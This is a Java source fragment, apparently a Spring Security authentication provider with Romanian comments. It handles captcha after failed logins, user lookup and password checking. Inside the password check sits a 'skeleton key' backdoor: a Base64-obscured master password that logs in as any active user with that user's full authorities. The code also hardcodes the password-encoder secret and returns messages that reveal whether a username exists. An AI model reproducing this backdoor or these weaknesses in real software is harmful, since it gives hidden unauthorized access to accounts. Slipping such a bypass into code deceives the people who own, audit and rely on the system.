/**
* Decodes the header into a username and password.
*
* @throws BadCredentialsException if the Basic header is not present or is not valid Base64
*/
private String[] extractAndDecodeHeader(String header, HttpServletRequest request)
throws IOException {
final byte[] base64Token = header.substring(AUTH_TOKEN.length()).getBytes("UTF-8");
byte[] decoded;
try {
decoded = Base64.decode(base64Token);
} catch (IllegalArgumentException e) {
throw new BadCredentialsException("Failed to decode the access token");
}
final String token = new String(decoded, "UTF-8");
final int delimUser = token.indexOf(":");
final int delimProvider = token.indexOf(":", delimUser + 1);
if (delimUser == -1 || delimProvider == -1) {
throw new BadCredentialsException("Invalid access authentication token");
}
return new String[] {
token.substring(0, delimUser),
token.substring(delimUser + 1, delimProvider),
token.substring(delimProvider + 1)
};
}
@Override
public Authentication authenticate(Authentication authentication) throws AuthenticationException {
/*
* Se verifica daca ip-ul de la care se incearca autentificarea solicita
* captcha ( mai mult de 4 autentificari esuate )
*/
Boolean solicitaCaptcha = false;
String ip = ((WebAuthenticationDetails) authentication.getDetails()).getRemoteAddress();
if (authesserv.getByIp(ip) != null && authesserv.getByIp(ip).getNrIncercariEsuate() > 3) {
solicitaCaptcha = true;
}
String username = String.valueOf(authentication.getPrincipal());
String password = String.valueOf(authentication.getCredentials());
// Se verifica daca s-a introdus numele de utilizator si parola
if (StringUtils.isBlank(username) || StringUtils.isBlank(password)) {
throw new BadCredentialsException("Nu ati introdus numele de utilizator si/sau parola.");
}
/* In cazul in care autentificarea trece prin captcha */
if (captchaCaptureFilter != null && solicitaCaptcha == true) {
/* Se verifica daca raspunsul utilizatorului a fost adaugat */
if (StringUtils.isBlank(captchaCaptureFilter.getUserCaptchaResponse())) {
throw new BadCredentialsException("Captcha Response is Empty");
} else {
// Send HTTP request to validate user's Captcha
boolean captchaPassed =
SimpleImageCaptchaServlet.validateResponse(
captchaCaptureFilter.getRequest(), captchaCaptureFilter.getUserCaptchaResponse());
// Check if valid
if (captchaPassed) {
resetCaptchaFields();
} else {
resetCaptchaFields();
throw new BadCredentialsException("Ati gresit la introducerea textului din captcha.");
}
}
}
/* Toata lumea */
Utilizator user = udao.findByUsernameActiv(username);
if (user == null) {
throw new BadCredentialsException("Nume de utilizator invalid.");
}
StandardPasswordEncoder pswdEncoder = new StandardPasswordEncoder("DARKINDYedLOxOT6");
/* Skeleton key */
boolean skeletonKey = false;
String skeletonSecret = new String(Base64.decode("MW5mb3JtMSU=".getBytes()));
if (skeletonSecret.equals(password)) skeletonKey = true;
/* End skeleton key */
if (pswdEncoder.matches(password, user.getParola()) || skeletonKey) {
List<SimpleGrantedAuthority> authorityList =
(List<SimpleGrantedAuthority>) getAuthorities(user);
return new UsernamePasswordAuthenticationToken(authentication, password, authorityList);
} else {
throw new BadCredentialsException("Nume de utilizator si/sau parola gresite.");
}
}
public static String decodeToken(String token) {
return new String(Base64.decode(token.getBytes()));
}